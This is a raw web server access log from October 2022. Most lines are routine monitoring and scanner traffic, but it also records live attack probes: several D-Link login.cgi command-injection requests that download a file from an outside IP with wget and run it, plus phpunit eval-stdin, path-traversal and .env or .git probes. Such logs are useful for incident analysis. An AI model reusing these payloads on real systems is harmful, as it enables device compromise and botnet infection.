212.91.246.72 - - [04/Oct/2022:09:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
20.219.33.178 - - [04/Oct/2022:09:35:28 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.219.33.178 - - [04/Oct/2022:09:35:28 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Oct/2022:09:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.182.243.125 - - [04/Oct/2022:09:39:46 +0200] "\x16\x03\x01" 501 318 "-" "-"
147.182.243.125 - - [04/Oct/2022:09:39:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
147.182.243.125 - - [04/Oct/2022:09:39:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2022:09:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
164.92.145.141 - - [04/Oct/2022:09:40:40 +0200] "\xdb\xe1~\x1cq\xf6\x92\xb8\x19\tG\x859\x99\xc2\xe8q/\x9f\xa3Q\v\xdd\xa3\xeb\x87\x1c\b]\v\xdd\xa3P\x0f\x9f\xa3Q\v\xde\xabQ\v\xdd\xa3Q\v\xdd\xa3\xfb\v\xdd\xa3Q\v\xf6\x88Q\v\xdd\xa3y\v\xdd\xa3Q\v\xdd\xa3Q\v\xdd\xa3Q\v\xdd\xa3P" 400 329 "-" "-"
164.92.145.141 - - [04/Oct/2022:09:40:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.92.145.141 - - [04/Oct/2022:09:40:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.92.145.141 - - [04/Oct/2022:09:40:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2022:09:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.222.117.211 - - [04/Oct/2022:09:41:49 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:09:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.181.60.39 - - [04/Oct/2022:09:41:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
212.91.246.72 - - [04/Oct/2022:09:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.163.109.66 - - [04/Oct/2022:09:43:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.163.109.66 - - [04/Oct/2022:09:43:41 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.163.109.66 - - [04/Oct/2022:09:43:41 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.163.109.66 - - [04/Oct/2022:09:43:41 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.163.109.66 - - [04/Oct/2022:09:43:42 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
34.78.120.99 - - [04/Oct/2022:09:43:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
35.233.62.116 - - [04/Oct/2022:09:43:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
212.91.246.72 - - [04/Oct/2022:09:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.36 - - [04/Oct/2022:09:45:48 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.63 - - [04/Oct/2022:09:45:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [04/Oct/2022:09:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.198.136.88 - - [04/Oct/2022:09:46:07 +0200] "\x16\x03\x01" 501 318 "-" "-"
143.198.136.88 - - [04/Oct/2022:09:46:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
143.198.136.88 - - [04/Oct/2022:09:46:07 +0200] "HELP" 501 319 "-" "-"
143.198.136.88 - - [04/Oct/2022:09:46:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
219.93.157.14 - - [04/Oct/2022:09:46:33 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:09:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.198.136.88 - - [04/Oct/2022:09:48:03 +0200] "PUT /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 405 378 "-" "Go-http-client/1.1"
143.198.136.88 - - [04/Oct/2022:09:48:03 +0200] "CONNECT leakix.net:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
143.198.136.88 - - [04/Oct/2022:09:48:04 +0200] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 400 333 "-" "Lkx-TraversalHttpPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis)"
43.153.10.221 - - [04/Oct/2022:09:48:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
212.91.246.72 - - [04/Oct/2022:09:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.198.230.41 - - [04/Oct/2022:09:52:26 +0200] "\x16\x03\x01" 501 318 "-" "-"
143.198.230.41 - - [04/Oct/2022:09:52:26 +0200] "\x16\x03\x01" 501 318 "-" "-"
143.198.230.41 - - [04/Oct/2022:09:52:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Oct/2022:09:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.231 - - [04/Oct/2022:09:54:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2022:09:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:09:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.108.124.79 - - [04/Oct/2022:10:01:57 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:10:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.31.46.179 - - [04/Oct/2022:10:05:23 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2022:10:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.185.116.25 - - [04/Oct/2022:10:08:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
205.185.116.25 - - [04/Oct/2022:10:08:15 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
212.91.246.72 - - [04/Oct/2022:10:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.17.240.139 - - [04/Oct/2022:10:12:07 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
205.185.121.69 - - [04/Oct/2022:10:12:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
212.91.246.72 - - [04/Oct/2022:10:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.185.121.69 - - [04/Oct/2022:10:12:50 +0200] "GET /favicon.ico HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
212.91.246.72 - - [04/Oct/2022:10:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.72.200.135 - - [04/Oct/2022:10:15:54 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:10:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.231 - - [04/Oct/2022:10:17:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2022:10:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
151.236.216.243 - - [04/Oct/2022:10:24:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.236.216.243 - - [04/Oct/2022:10:24:16 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:10:24:16 +0200] "POST /scripts/WPnBr.dll HTTP/1.1" 404 322 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:10:24:16 +0200] "GET /.git/HEAD HTTP/1.1" 404 314 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:10:24:16 +0200] "GET /nmaplowercheck1664871856 HTTP/1.1" 404 329 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:10:24:16 +0200] "GET /CSS/Miniweb.css HTTP/1.1" 404 320 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:10:24:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:10:24:16 +0200] "GET /Portal/Portal.mwsl HTTP/1.1" 404 323 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:10:24:16 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:10:24:17 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
151.236.216.243 - - [04/Oct/2022:10:24:17 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
151.236.216.243 - - [04/Oct/2022:10:24:17 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
151.236.216.243 - - [04/Oct/2022:10:24:17 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
151.236.216.243 - - [04/Oct/2022:10:24:17 +0200] "GET /pools HTTP/1.1" 404 310 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:10:24:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:10:24:17 +0200] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:10:24:18 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
151.236.216.243 - - [04/Oct/2022:10:24:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.236.216.243 - - [04/Oct/2022:10:24:19 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
151.236.216.243 - - [04/Oct/2022:10:24:20 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
151.236.216.243 - - [04/Oct/2022:10:24:20 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
151.236.216.243 - - [04/Oct/2022:10:24:20 +0200] "GET /__Additional HTTP/1.1" 404 317 "-" "curl/7.54.0"
151.236.216.243 - - [04/Oct/2022:10:24:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.236.216.243 - - [04/Oct/2022:10:24:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2022:10:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.31.46.179 - - [04/Oct/2022:10:25:29 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2022:10:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
217.15.151.155 - - [04/Oct/2022:10:37:45 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:10:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.231 - - [04/Oct/2022:10:39:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2022:10:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.231 - - [04/Oct/2022:10:41:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2022:10:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.12.139.113 - - [04/Oct/2022:10:42:05 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Oct/2022:10:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.231 - - [04/Oct/2022:10:44:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2022:10:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
208.100.26.233 - - [04/Oct/2022:10:46:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4217.2 Safari/537.36"
85.31.46.179 - - [04/Oct/2022:10:46:45 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2022:10:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.132 - - [04/Oct/2022:10:47:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Oct/2022:10:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.231 - - [04/Oct/2022:10:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2022:10:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.247.252 - - [04/Oct/2022:10:49:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
65.49.20.69 - - [04/Oct/2022:10:50:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Oct/2022:10:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2022:10:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.40.165.4 - - [04/Oct/2022:10:52:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2022:10:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.247.247 - - [04/Oct/2022:10:54:25 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.79 Safari/537.36"
212.91.246.72 - - [04/Oct/2022:10:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.97 - - [04/Oct/2022:10:55:32 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0"
